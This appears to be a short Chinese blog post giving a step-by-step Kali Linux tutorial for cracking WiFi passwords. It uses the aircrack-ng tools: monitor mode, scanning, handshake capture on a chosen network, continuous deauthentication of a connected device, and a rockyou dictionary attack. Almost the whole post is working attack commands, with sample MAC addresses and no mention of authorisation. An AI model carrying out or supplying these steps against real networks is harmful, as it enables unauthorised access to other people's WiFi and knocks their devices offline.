2020-03-02
首先获取root权限,sudo passwd修改root密码,修改之后su – 切换为root用户。
1、 命令airmon-ng start wlan0开启网卡监听模式
2、输入iwconfig命令查看网卡信息, wlan0mon网卡名加了mon则表示成功, airmon-ng check kill结束相关阻塞进程
3、命令airodump-ng wlan0mon,开始扫描WiFi,按ctrl+c结束任务
BSSID为wifi的MAC地址,PWR为信号强弱程度,数值越小信号越强;#DATA为数据量,越大使用的人就越多,CH为信道频率(频道),ESSID为wifi的名称,中文可能会有乱码
4、接着输入airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon
如:airodump-ng --bssid BC:5F:6F:3D:03:72 -c 13 -w /root/a wlan0mon
5、如果抓取不到数据,新建一个终端:键入airepaly-ng -0 0 -c 连接到WiFi的手机mac地址 -a bssid 网卡名(一般为wlan0mon)
如:aireplay-ng -0 0 -c 93:10:E8:63:20:CF -a 71:A1:06:59:61:78 wlan0mon 最好手输以免报错
6、解压kali自带的字典文件 路径:/usr/share/wordlists/rockyou.txt.gz
如 :gzip –d /usr/share/wordlists/rockyou.txt.gz
7、键入 aircrack-ng -w 字典路径 握手包路径,回车后开始爆破
如:aircrack-ng -w /usr/share/wordlists/rockyou.txt a-01.cap
发表评论